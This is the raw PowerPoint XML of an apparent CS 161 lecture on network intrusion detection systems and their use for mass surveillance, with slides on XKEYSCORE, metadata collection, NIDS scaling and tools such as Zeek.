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47.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide47.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/media/image74.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image73.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image72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jpeg" ContentType="image/jpeg"/>
  <Override PartName="/ppt/media/image44.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image43.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image60.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image42.jpeg" ContentType="image/jpe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16.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image15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.jpeg" ContentType="image/jpeg"/>
  <Override PartName="/ppt/media/image5.jpeg" ContentType="image/jpeg"/>
  <Override PartName="/ppt/media/image67.tif" ContentType="image/tiff"/>
  <Override PartName="/ppt/media/image17.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image68.tif" ContentType="image/tiff"/>
  <Override PartName="/ppt/media/image18.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image69.tif" ContentType="image/tiff"/>
  <Override PartName="/ppt/media/image19.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image70.tif" ContentType="image/tiff"/>
  <Override PartName="/ppt/media/image45.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image20.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image71.tif" ContentType="image/tiff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75.tif" ContentType="image/tiff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56.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image31.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image58.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image33.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image59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64.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image9.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image62.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image7.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image63.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image8.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image61.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image6.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image4.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image3.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image57.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image32.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image2.tif" ContentType="image/tiff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x="2438400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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>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48DAA02-B5A7-4695-85D7-65261E779FA9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hyperlink" Target="http://cryptome.org/2013/12/nsa-quantum-tasking.pdf" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide47.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/>
</Relationship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480" cy="3426480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr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6680" cy="41122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3840">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:latin typeface="Lucida Grande"/>
                <a:ea typeface="Lucida Grande"/>
              </a:rPr>
              <a:t>The NSA's diagram is actually a fair bit more complex:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="20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Lucida Grande"/>
                <a:ea typeface="Lucida Grande"/>
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>cryptome.org/2013/12/nsa-quantum-tasking.pdf</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="20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Lucida Grande"/>
                <a:ea typeface="Lucida Grande"/>
              </a:rPr>
              <a:t>Because their architecture is (we'll see in a second) wrong.  This "Quantum Tasking" slide deck also gives a good view into the metadata collection as well.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike"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144360" y="2768040"/>
            <a:ext cx="24652440" cy="33696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e95954"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="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50040" y="2728800"/>
            <a:ext cx="5105160" cy="416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Computer Science 161 Summer 2019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19193760" y="2728800"/>
            <a:ext cx="5105160" cy="416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Dutra &amp; Jawale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-144360" y="2768040"/>
            <a:ext cx="24652440" cy="33696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e95954"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="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2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="50040" y="2728800"/>
            <a:ext cx="5105160" cy="416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Computer Science 161 Summer 2019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" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="19193760" y="2728800"/>
            <a:ext cx="5105160" cy="416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Dutra &amp; Jawale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tif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www.documentcloud.org/documents/2116191-unofficial-xks-user-guide.html" TargetMode="Externa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://bridges.torproject.org" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.torproject.org" TargetMode="External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7.tif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8.tif"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image69.tif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0.tif"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image71.tif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5.ti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258480" y="3364200"/>
            <a:ext cx="10254960" cy="6157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algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="104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Intrusion Detection:</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="104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and </a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:rPr b="1" i="1" lang="en-US" sz="104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Misuse</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1047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" name="swifty.jpg" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:srcRect l="13580" t="0" r="30" b="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9784800" y="5266800"/>
            <a:ext cx="14585400" cy="84358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Not About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Connecting the Dots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9" name="Group 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-73080" y="3097080"/>
            <a:ext cx="24581160" cy="19859760"/>
            <a:chOff x="-73080" y="3097080"/>
            <a:chExt cx="24581160" cy="19859760"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="130" name="Image" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId1"/>
            <a:srcRect l="0" t="0" r="0" b="9559"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="-73080" y="3097080"/>
              <a:ext cx="24581160" cy="1985976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1" name="CustomShape 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="21349800" y="16401960"/>
              <a:ext cx="2685960" cy="557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71280" rIns="71280" tIns="71280" bIns="7128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ffff"/>
                  </a:solidFill>
                  <a:latin typeface="Arial"/>
                  <a:ea typeface="Arial"/>
                </a:rPr>
                <a:t>NASA/ESA photo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75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Drift Nets to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Create Metadata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Image" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3435120" y="3191400"/>
            <a:ext cx="17511480" cy="10240560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12600"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13998600" y="12843000"/>
            <a:ext cx="5884560" cy="50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José Ramón García Ares for Wikipedia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15343200" y="7078320"/>
            <a:ext cx="261576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.doc file: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Author X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5418000" y="6462000"/>
            <a:ext cx="451296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HTTP Request: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URL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38" name="CustomShape 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5869440" y="8658360"/>
            <a:ext cx="3996360" cy="9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Is an Iphone?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9810720" y="7153200"/>
            <a:ext cx="424332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Spotted .onion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URL: X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40" name="CustomShape 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13030920" y="9152280"/>
            <a:ext cx="422964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PGP message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key: X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41" name="CustomShape 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6375960" y="9789120"/>
            <a:ext cx="597456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Mojahadeen Secrets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key: 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Pulling Threads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To Get Results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5" name="Image" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:srcRect l="0" t="12049" r="0" b="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-70200" y="3100320"/>
            <a:ext cx="24504120" cy="14344200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12600">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="146" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="21643560" y="13093200"/>
            <a:ext cx="2701080" cy="50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Wikimedia Photo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8" dur="7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Thread To Pull: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Watching an IRC Chat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"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3816360" y="3288960"/>
            <a:ext cx="17324280" cy="2336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ourier New"/>
                <a:ea typeface="Courier New"/>
              </a:rPr>
              <a:t>OtherDude: Hey, did you see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ourier New"/>
                <a:ea typeface="Courier New"/>
              </a:rPr>
              <a:t>OtherDude: http://www.bbc.com/news/world-us-canada-16330396?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ourier New"/>
                <a:ea typeface="Courier New"/>
              </a:rPr>
              <a:t>AnonDude: hmmm...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ourier New"/>
                <a:ea typeface="Courier New"/>
              </a:rPr>
              <a:t>AnonDude: HAHAH, that's pretty funny!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8196120" y="5780880"/>
            <a:ext cx="13781880" cy="9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Intercept captured 12/30/2011 11:32 GMT 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4359600" y="7003800"/>
            <a:ext cx="15028560" cy="3188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Step 1: "Use SIGINT" (Signals Intelligence)/DNI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(Digital Network Intelligence):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Enables identification of AnonDude and developing a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"pattern of life" for his online behavior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52" name="CustomShape 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4448880" y="10643040"/>
            <a:ext cx="14975280" cy="242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Step 2: "Use CNE" (Computer Network Exploitation):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After identification, invoke "exploit by name" to take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over AnonDude's computer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With Your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Wiretaps...  XKEYSCORE DEEPDIVE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Image" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1950840" y="3096360"/>
            <a:ext cx="19821240" cy="14339520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12600">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="156" name="Image" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect l="3755" t="2959" r="3048" b="2611"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2988000" y="1188072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157" name="Image" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect l="3755" t="2959" r="3048" b="2611"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="19191240" y="622728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158" name="Image" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect l="3755" t="2959" r="3048" b="2611"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="19661400" y="834984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159" name="Image" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:srcRect l="3755" t="2959" r="3048" b="2611"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4114080" y="5175720"/>
            <a:ext cx="898560" cy="898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nodeType="afterEffect" fill="hold" presetClass="entr" presetID="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nodeType="afterEffect" fill="hold" presetClass="entr" presetID="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nodeType="afterEffect" fill="hold" presetClass="entr" presetID="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4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How They Work: Scalable Network Intrusion Detection Systems.  Yeup, exactly the same!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Line 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2836440" y="4174920"/>
            <a:ext cx="18711000" cy="360"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="1778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63" name="Group 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11932920" y="3916080"/>
            <a:ext cx="1722960" cy="2652480"/>
            <a:chOff x="11932920" y="3916080"/>
            <a:chExt cx="1722960" cy="2652480"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="164" name="Line 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="12191760" y="4125600"/>
              <a:ext cx="360" cy="2442960"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom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CustomShape 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11932920" y="3916080"/>
              <a:ext cx="515520" cy="515520"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0000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CustomShape 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12436200" y="4322520"/>
              <a:ext cx="121968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Tap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67" name="Group 8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9217440" y="6615360"/>
            <a:ext cx="5948640" cy="2013840"/>
            <a:chOff x="9217440" y="6615360"/>
            <a:chExt cx="5948640" cy="2013840"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="168" name="CustomShape 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9217440" y="6615360"/>
              <a:ext cx="5948640" cy="903600"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="ffffff"/>
            </a:solidFill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High Volume Filter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69" name="Line 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="12191760" y="7540920"/>
              <a:ext cx="360" cy="1088280"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom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70" name="Group 11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9892440" y="10763280"/>
            <a:ext cx="4599000" cy="1671480"/>
            <a:chOff x="9892440" y="10763280"/>
            <a:chExt cx="4599000" cy="1671480"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="171" name="CustomShape 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10931040" y="11531160"/>
              <a:ext cx="3560400" cy="903600"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="ffffff"/>
            </a:solidFill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NIDS Node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72" name="CustomShape 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10422000" y="11120400"/>
              <a:ext cx="3560400" cy="903600"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="ffffff"/>
            </a:solidFill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NIDS Node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73" name="CustomShape 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9892440" y="10763280"/>
              <a:ext cx="3560400" cy="903600"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="ffffff"/>
            </a:solidFill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NIDS Node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74" name="Group 15"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9858240" y="8689320"/>
            <a:ext cx="4667040" cy="2004120"/>
            <a:chOff x="9858240" y="8689320"/>
            <a:chExt cx="4667040" cy="2004120"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="175" name="CustomShape 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9858240" y="8689320"/>
              <a:ext cx="4667040" cy="903600"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="ffffff"/>
            </a:solidFill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Load Balancer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76" name="Line 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="12189600" y="9605520"/>
              <a:ext cx="360" cy="1087920"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="17784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7" name="CustomShape 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2664720" y="3553560"/>
            <a:ext cx="836280" cy="4201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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11772360" y="3553560"/>
            <a:ext cx="836280" cy="4201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20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15519600" y="6655680"/>
            <a:ext cx="5589000" cy="9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Is Not BitTorrent?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80" name="CustomShape 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15162840" y="8646120"/>
            <a:ext cx="3556080" cy="9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H(SIP, DIP)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="5000" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="181" name="Group 22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2829240" y="5364360"/>
            <a:ext cx="6694560" cy="3593880"/>
            <a:chOff x="2829240" y="5364360"/>
            <a:chExt cx="6694560" cy="3593880"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="182" name="CustomShape 23"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2829240" y="5364360"/>
              <a:ext cx="6693840" cy="24271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Do this in OpenFlow:</a:t>
              </a:r>
              <a:br/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100 Gbps installs</a:t>
              </a:r>
              <a:br/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already done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83" name="Line 24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7591320" y="7458840"/>
              <a:ext cx="1711440" cy="360"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="633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Line 25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7388280" y="7589880"/>
              <a:ext cx="2135520" cy="1368360"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="633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5" name="Group 26"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2930040" y="9566640"/>
            <a:ext cx="6630480" cy="3188880"/>
            <a:chOff x="2930040" y="9566640"/>
            <a:chExt cx="6630480" cy="3188880"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="186" name="CustomShape 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2930040" y="9566640"/>
              <a:ext cx="6383160" cy="3188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Linear Scaling:</a:t>
              </a:r>
              <a:br/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10x the money...</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="5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10x the bandwidth!</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="5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1u gives 1-5 Gbps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87" name="Line 28"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8111880" y="11161440"/>
              <a:ext cx="1448640" cy="360"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="633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5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6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73520 -0.000000">
                                      <p:cBhvr>
                                        <p:cTn id="17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385 0.236973">
                                      <p:cBhvr>
                                        <p:cTn id="18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373520 -0.000000 L 0.755441 -0.000000">
                                      <p:cBhvr>
                                        <p:cTn id="18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385 0.236973 L 0.000210 0.388145">
                                      <p:cBhvr>
                                        <p:cTn id="19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210 0.388145 L -0.067303 0.540350">
                                      <p:cBhvr>
                                        <p:cTn id="20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Inside the NIDS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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3783600" y="10253520"/>
            <a:ext cx="1032840" cy="51552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220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3802320" y="7710840"/>
            <a:ext cx="847080" cy="5155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GET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783600" y="5168160"/>
            <a:ext cx="1424160" cy="51552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GET HT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5191200" y="5168160"/>
            <a:ext cx="1424160" cy="51552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TP /fu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6619320" y="5168160"/>
            <a:ext cx="1032840" cy="51552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bar/ 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7631280" y="5168160"/>
            <a:ext cx="1424160" cy="51552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 </a:t>
            </a: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1.1..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6" name="CustomShape 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4626360" y="7710840"/>
            <a:ext cx="1628640" cy="5155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HTTP /b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7" name="CustomShape 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6233760" y="7710840"/>
            <a:ext cx="1628640" cy="5155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az/?id=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8" name="CustomShape 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7828920" y="7710840"/>
            <a:ext cx="2640600" cy="515520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5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1f413 1.1...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99" name="CustomShape 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4728600" y="10253520"/>
            <a:ext cx="4027320" cy="51552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mail.domain.target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00" name="CustomShape 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8698320" y="10253520"/>
            <a:ext cx="3650400" cy="515520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent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noAutofit/>
          </a:bodyPr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ffffff"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
              </a:rPr>
              <a:t>ESMTP Sendmail...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01" name="CustomShape 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13377240" y="4203720"/>
            <a:ext cx="4554360" cy="2427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HTTP Request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URL = /fubar/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Host = ....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202" name="CustomShape 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13239000" y="6746400"/>
            <a:ext cx="5951520" cy="2427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HTTP Request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URL = /baz/?id=...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ID = 1f413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203" name="CustomShape 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13130640" y="9289080"/>
            <a:ext cx="6809760" cy="2427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Sendmail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From = someguy@...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To = otherguy@...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204" name="CustomShape 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3782880" y="11831760"/>
            <a:ext cx="17818920" cy="1665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Unlike conventional NIDS </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1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you don't worry about evasion</a:t>
            </a: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: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Anyone who wants to evade uses cryptography instead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4" dur="indefinite" restart="never" nodeType="tmRoot">
          <p:childTnLst>
            <p:seq>
              <p:cTn id="215" dur="indefinite" nodeType="mainSeq">
                <p:childTnLst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2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000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="234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0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="238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000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="242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000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="246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4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"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="250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5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9000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="254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5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8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6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Which NIDS To Use?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sngStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>Bro</a:t>
            </a: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i="1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Zeek</a:t>
            </a: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Network Security Monitor (BSD licensee)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Includes a robust suite of protocol parsers</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="425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Realtime operation, invokes policy scripts</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="425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Requires seeing both sides of the traffic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Lockheed/Martin Vortex (GPL)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Only handles the reassembly:</a:t>
            </a:r>
            <a:br/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Network traffic to files, then invoke separate parser programs</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="425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Near real-time operation:</a:t>
            </a:r>
            <a:br/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Bet, this is the basis for XKEYSCORE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Eagle GLINT by Nexa Technologies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Formerly Amesys (was part of Bull)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="425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Commercial “Intelligence” interception package</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4250" spc="-1" strike="noStrike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Image" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="19881360" y="3343320"/>
            <a:ext cx="3729960" cy="3569400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12600">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="209" name="Image" descr=""/>
